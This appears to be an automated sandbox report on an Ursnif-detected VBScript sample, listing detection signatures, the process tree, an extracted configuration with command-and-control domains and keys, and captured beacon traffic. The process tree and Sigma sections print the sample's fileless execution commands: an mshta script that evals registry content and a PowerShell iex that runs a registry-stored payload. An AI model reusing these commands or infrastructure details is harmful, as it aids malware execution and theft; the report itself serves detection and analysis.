Play interactive tour

Edit tour

Windows Analysis Report v8MaHZpVOY2L.vbs

Overview

General Information

Sample Name:	v8MaHZpVOY2L.vbs
Analysis ID:	458149
MD5:	5d6eee678e2f66bef8885b3b3064db81
SHA1:	4f64fdc2929e29ad8c001a0c3d8ad02f175f68d8
SHA256:	9889b06c39eab474b06205ab27007447ee6e7eebdb8ac2e55b31eaacdcde8a49
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Benign windows process drops PE files

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Encoded IEX

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

VBScript performs obfuscated calls to suspicious functions

Yara detected Ursnif

Creates processes via WMI

Deletes itself after installation

Hooks registry keys query functions (used to hide registry keys)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Mshta Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes registry values via WMI

AV process strings found (often used to terminate AV products)

Compiles C# or VB.Net code

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain checking for process token information

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Stores large binary data to the registry

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

wscript.exe (PID: 748 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\v8MaHZpVOY2L.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

WmiPrvSE.exe (PID: 5924 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)

rundll32.exe (PID: 5940 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 4576 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WmiPrvSE.exe (PID: 484 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 7AB59579BA91115872D6E51C54B9133B)

WmiPrvSE.exe (PID: 2844 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)

mshta.exe (PID: 5200 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bmd2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bmd2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 4260 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 4948 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "9LNhwxYlD34jdxVCbRuhkLxCR5ltHK+f92WD9cMttCYYbvrL4wv6YJiUl9MHov+IIcYUbYs1JFt6ciXd5FdaoSi3eR2WJz3cKGQV77NysByS4hxLa5EsHQS3R7uDA4zT8rf/1GgZx5Tp5bLYUv+OvwzR6K0bcxr8BVKOhWasMt87tt2F/oc67dLXbG6cOVSb9XDEKm1AD4WNvDG5s+8oRXKyXYNyBvqnTooYX8iM4Wq8R9SXbFoTevuBBwCGXRu7hbWXoRZP6gXfoUqzaH99rq2BGpO8MD8zNQdBO2RxQLO9iayjRA/+oZ0IQHzkfaTa+mDCPgDQii50gVawYZtAvTBYJQQyRdCtVbewt3iRduY=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "eTV3coItEryBMTIK", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "3"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 4576	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 7 entries

Sigma Overview

System Summary:

Sigma detected: Encoded IEX

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bmd2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bmd2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5200, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4260

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bmd2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bmd2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5200, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4260

Sigma detected: Mshta Spawning Windows Shell

Show sources

Source: Process started

Sigma detected: Suspicious Csc.exe Source File Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4260, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline', ProcessId: 4948

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bmd2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bmd2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5200, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4260

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://gtr.antoinfer.com/rlxVSKuL/2_2BsetYpYqkPa4ojd3ueIs/LptIHuoMYe/oePXHReeS37D5yQcj/NVMKXI44Lp_2/FBXX9_2Bb20/jKEI_2Bgs2rJZa/uDvTh6TWLh5vgJvzY3DD5/t9e4NaZqHQBjkiny/8qc8N7JBB_2BWAp/j62HsMJoXm5nFzMKnH/PUlPiGqu_/2BwmGwUAtbFIfQPHyxkA/s1QKb9NHLGrKFNlhNvS/ugnsSzKyJjdaSAXMmE7nnq/w4loggPNqDjSA/3u_2Fu4X/o8m8kFpFCtqZfzxEWO6Thbv/o4OD2d7LJV/azLj6lFTEoSfLl1Au/Hx1vAUoJagaa/8_2Faxj3Ge9/KUQqi9K	Avira URL Cloud: Label: malware
Source: http://app.flashgameo.at/G_2BtrdeOa30tm0G9t89_/2B2JiDdQSL9x3Q_2/FX260sNBDITgyeI/BpdcrPIFomZZkoPh3u/AGrnxiUWf/rTd4z_2FOnqpP22ZfzjV/mxG1oweqZWhdtbLmZAx/FWCeM7DpHnLSREoZzBO0OT/Gl1f2t9tfS_2B/ptWI3fqD/FvNQq67awVJw_2B1kVzh8_2/BYbRBRJlE6/co1z79C1RuybQlL62/8psEOCbjHHAG/PdRgwv9Npt6/R_2FEA3He8vvaK/f3TQbAUz8vl1HZbrGMu9B/8naEcnAAoMKIKsYO/rVxHWtDfSOnGKso/2ZAFkBCgt5yBJA/G	Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 0000001C.00000003.600911240.0000000004280000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "9LNhwxYlD34jdxVCbRuhkLxCR5ltHK+f92WD9cMttCYYbvrL4wv6YJiUl9MHov+IIcYUbYs1JFt6ciXd5FdaoSi3eR2WJz3cKGQV77NysByS4hxLa5EsHQS3R7uDA4zT8rf/1GgZx5Tp5bLYUv+OvwzR6K0bcxr8BVKOhWasMt87tt2F/oc67dLXbG6cOVSb9XDEKm1AD4WNvDG5s+8oRXKyXYNyBvqnTooYX8iM4Wq8R9SXbFoTevuBBwCGXRu7hbWXoRZP6gXfoUqzaH99rq2BGpO8MD8zNQdBO2RxQLO9iayjRA/+oZ0IQHzkfaTa+mDCPgDQii50gVawYZtAvTBYJQQyRdCtVbewt3iRduY=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "eTV3coItEryBMTIK", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "3"}

Multi AV Scanner detection for domain / URL

Show sources

Source: gtr.antoinfer.com	Virustotal: Detection: 12%			Perma Link
Source: app.flashgameo.at	Virustotal: Detection: 11%			Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\beneficial.odt

ReversingLabs: Detection: 35%

Multi AV Scanner detection for submitted file

Show sources

Source: v8MaHZpVOY2L.vbs	Virustotal: Detection: 34%			Perma Link
Source: v8MaHZpVOY2L.vbs	ReversingLabs: Detection: 13%

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 28_2_04444CEA CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

28_2_04444CEA

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.pdbXP@L source: powershell.exe, 00000025.00000002.750257715.000001D6861CE000.00000004.00000001.sdmp
Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000027.00000002.731260483.0000015F83160000.00000002.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.pdb8 source: powershell.exe, 00000025.00000002.750151124.000001D68618E000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\kf2dbsxa\kf2dbsxa.pdb source: powershell.exe, 00000025.00000002.744104497.000001D6848CF000.00000004.00000001.sdmp
Source:	Binary string: c:\Did\off\flow-Shoulder\Son\Record.pdb source: wscript.exe, 00000002.00000003.406245520.00000294B943D000.00000004.00000001.sdmp, rundll32.exe, 0000001C.00000002.736255174.0000000070329000.00000002.00020000.sdmp, beneficial.odt.2.dr
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\kf2dbsxa\kf2dbsxa.pdbXP@L source: powershell.exe, 00000025.00000002.744104497.000001D6848CF000.00000004.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49744 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49745 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49745 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49746 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49746 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49747 -> 185.228.233.17:80

Source: Joe Sandbox View

ASN Name: ITOS-ASRU ITOS-ASRU

Source: global traffic	HTTP traffic detected: GET /rlxVSKuL/2_2BsetYpYqkPa4ojd3ueIs/LptIHuoMYe/oePXHReeS37D5yQcj/NVMKXI44Lp_2/FBXX9_2Bb20/jKEI_2Bgs2rJZa/uDvTh6TWLh5vgJvzY3DD5/t9e4NaZqHQBjkiny/8qc8N7JBB_2BWAp/j62HsMJoXm5nFzMKnH/PUlPiGqu_/2BwmGwUAtbFIfQPHyxkA/s1QKb9NHLGrKFNlhNvS/ugnsSzKyJjdaSAXMmE7nnq/w4loggPNqDjSA/3u_2Fu4X/o8m8kFpFCtqZfzxEWO6Thbv/o4OD2d7LJV/azLj6lFTEoSfLl1Au/Hx1vAUoJagaa/8_2Faxj3Ge9/KUQqi9K HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic	HTTP traffic detected: GET /_2FPQI_2BhXbN/xv2lU8Kt/H_2BdMo7RP11B49_2B_2F0p/qZonO_2BsX/r_2FXf13KB9QuPtJ8/fzPhqB_2BKd8/L6vOPdmyzVt/cOhxQgVRfJCJOJ/2LqjFunTc58GKXt_2Fach/MI8acKZfKve2lDEv/O3RXxaeZ1jmnB_2/BM9wKTm5ezPhIbAkjC/N5BuSzoVY/tbmUpCJD8R6uccF9y9i6/TVII1EazLMdbmsastBa/0EuLYCoDqjXXpV7R0KscZQ/pLkoykG5NbmPg/94pI1TlM/k2tyuNpa_2FFDzXBR3wx_2B/y8INZfX1Fd/ksZUQaKi9Q7CR7rUB/b0tO0OTt2nw2/3iZt0Tq5yV/igZ HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic	HTTP traffic detected: GET /kOsDeCoa3YCbt/7unBBLww/wK2a4bs_2FEI4QMN91PzB77/bz4N4g_2FJ/HycIy3_2F8zj3jBC0/8_2FW3BGV1mS/XPDK9f9Rzez/BpS5UyR9Bg2zMd/a_2FnA03_2FZhf2fI92gT/6Pq3nEyBr7Wl1SSB/zAmSQjqWqXfIY_2/Byf0kTcmXemOm2EfN6/CRY7WM32g/emO80EseOb_2BSjCXMeG/FctE3VztzFEWZR0a5bZ/yCEZcBPGdi592UoFqj3gHf/9Ntn0rghQ_2Bu/Ix9av6MS/M_2FOYWbdmDkx6Xj7Ngd9FO/n_2Fp4ojwk/l2YrsEsA6NU73tN6Q/Nzovizi1/wIzBsN1hETht/VNa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic	HTTP traffic detected: GET /G_2BtrdeOa30tm0G9t89_/2B2JiDdQSL9x3Q_2/FX260sNBDITgyeI/BpdcrPIFomZZkoPh3u/AGrnxiUWf/rTd4z_2FOnqpP22ZfzjV/mxG1oweqZWhdtbLmZAx/FWCeM7DpHnLSREoZzBO0OT/Gl1f2t9tfS_2B/ptWI3fqD/FvNQq67awVJw_2B1kVzh8_2/BYbRBRJlE6/co1z79C1RuybQlL62/8psEOCbjHHAG/PdRgwv9Npt6/R_2FEA3He8vvaK/f3TQbAUz8vl1HZbrGMu9B/8naEcnAAoMKIKsYO/rVxHWtDfSOnGKso/2ZAFkBCgt5yBJA/G HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: app.flashgameo.at
Source: global traffic	HTTP traffic detected: POST /x7RHILsUu13RNWdAgcyIG/qtXPZ5mShxWyId8A/aqzFvUR1vpmX8Up/q_2B2EdTfKMNCz0qxF/_2FPDHq0L/LUAKCoi5Kv4k92FCS9c4/5pNcQF7C6KYMZBsUSDt/KFidT5iQrYQJ8LRP_2FoLY/f_2B88YT7woyk/KKJVXmPv/vF_2FE_2Fvc1X20QJ8r0Wn_/2BzNsjc_2F/YMdyw7a8HJLKOf2JR/adM5VRnv5AOV/eVROMbVITYu/4QdgxMF4kpaBK6/UL3JxZ6B_2FLQEdWMX_2B/oDqnX_2BCDatYw9I/KVGr3LtJ92s34dn/eT_2Bba67PTBBLkoO/1xww0J HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: app.flashgameo.at

Source: global traffic	HTTP traffic detected: GET /rlxVSKuL/2_2BsetYpYqkPa4ojd3ueIs/LptIHuoMYe/oePXHReeS37D5yQcj/NVMKXI44Lp_2/FBXX9_2Bb20/jKEI_2Bgs2rJZa/uDvTh6TWLh5vgJvzY3DD5/t9e4NaZqHQBjkiny/8qc8N7JBB_2BWAp/j62HsMJoXm5nFzMKnH/PUlPiGqu_/2BwmGwUAtbFIfQPHyxkA/s1QKb9NHLGrKFNlhNvS/ugnsSzKyJjdaSAXMmE7nnq/w4loggPNqDjSA/3u_2Fu4X/o8m8kFpFCtqZfzxEWO6Thbv/o4OD2d7LJV/azLj6lFTEoSfLl1Au/Hx1vAUoJagaa/8_2Faxj3Ge9/KUQqi9K HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic	HTTP traffic detected: GET /_2FPQI_2BhXbN/xv2lU8Kt/H_2BdMo7RP11B49_2B_2F0p/qZonO_2BsX/r_2FXf13KB9QuPtJ8/fzPhqB_2BKd8/L6vOPdmyzVt/cOhxQgVRfJCJOJ/2LqjFunTc58GKXt_2Fach/MI8acKZfKve2lDEv/O3RXxaeZ1jmnB_2/BM9wKTm5ezPhIbAkjC/N5BuSzoVY/tbmUpCJD8R6uccF9y9i6/TVII1EazLMdbmsastBa/0EuLYCoDqjXXpV7R0KscZQ/pLkoykG5NbmPg/94pI1TlM/k2tyuNpa_2FFDzXBR3wx_2B/y8INZfX1Fd/ksZUQaKi9Q7CR7rUB/b0tO0OTt2nw2/3iZt0Tq5yV/igZ HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic	HTTP traffic detected: GET /kOsDeCoa3YCbt/7unBBLww/wK2a4bs_2FEI4QMN91PzB77/bz4N4g_2FJ/HycIy3_2F8zj3jBC0/8_2FW3BGV1mS/XPDK9f9Rzez/BpS5UyR9Bg2zMd/a_2FnA03_2FZhf2fI92gT/6Pq3nEyBr7Wl1SSB/zAmSQjqWqXfIY_2/Byf0kTcmXemOm2EfN6/CRY7WM32g/emO80EseOb_2BSjCXMeG/FctE3VztzFEWZR0a5bZ/yCEZcBPGdi592UoFqj3gHf/9Ntn0rghQ_2Bu/Ix9av6MS/M_2FOYWbdmDkx6Xj7Ngd9FO/n_2Fp4ojwk/l2YrsEsA6NU73tN6Q/Nzovizi1/wIzBsN1hETht/VNa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic	HTTP traffic detected: GET /G_2BtrdeOa30tm0G9t89_/2B2JiDdQSL9x3Q_2/FX260sNBDITgyeI/BpdcrPIFomZZkoPh3u/AGrnxiUWf/rTd4z_2FOnqpP22ZfzjV/mxG1oweqZWhdtbLmZAx/FWCeM7DpHnLSREoZzBO0OT/Gl1f2t9tfS_2B/ptWI3fqD/FvNQq67awVJw_2B1kVzh8_2/BYbRBRJlE6/co1z79C1RuybQlL62/8psEOCbjHHAG/PdRgwv9Npt6/R_2FEA3He8vvaK/f3TQbAUz8vl1HZbrGMu9B/8naEcnAAoMKIKsYO/rVxHWtDfSOnGKso/2ZAFkBCgt5yBJA/G HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: app.flashgameo.at

Source: unknown

DNS traffic detected: queries for: gtr.antoinfer.com

Source: unknown

HTTP traffic detected: POST /x7RHILsUu13RNWdAgcyIG/qtXPZ5mShxWyId8A/aqzFvUR1vpmX8Up/q_2B2EdTfKMNCz0qxF/_2FPDHq0L/LUAKCoi5Kv4k92FCS9c4/5pNcQF7C6KYMZBsUSDt/KFidT5iQrYQJ8LRP_2FoLY/f_2B88YT7woyk/KKJVXmPv/vF_2FE_2Fvc1X20QJ8r0Wn_/2BzNsjc_2F/YMdyw7a8HJLKOf2JR/adM5VRnv5AOV/eVROMbVITYu/4QdgxMF4kpaBK6/UL3JxZ6B_2FLQEdWMX_2B/oDqnX_2BCDatYw9I/KVGr3LtJ92s34dn/eT_2Bba67PTBBLkoO/1xww0J HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: app.flashgameo.at

Source: powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
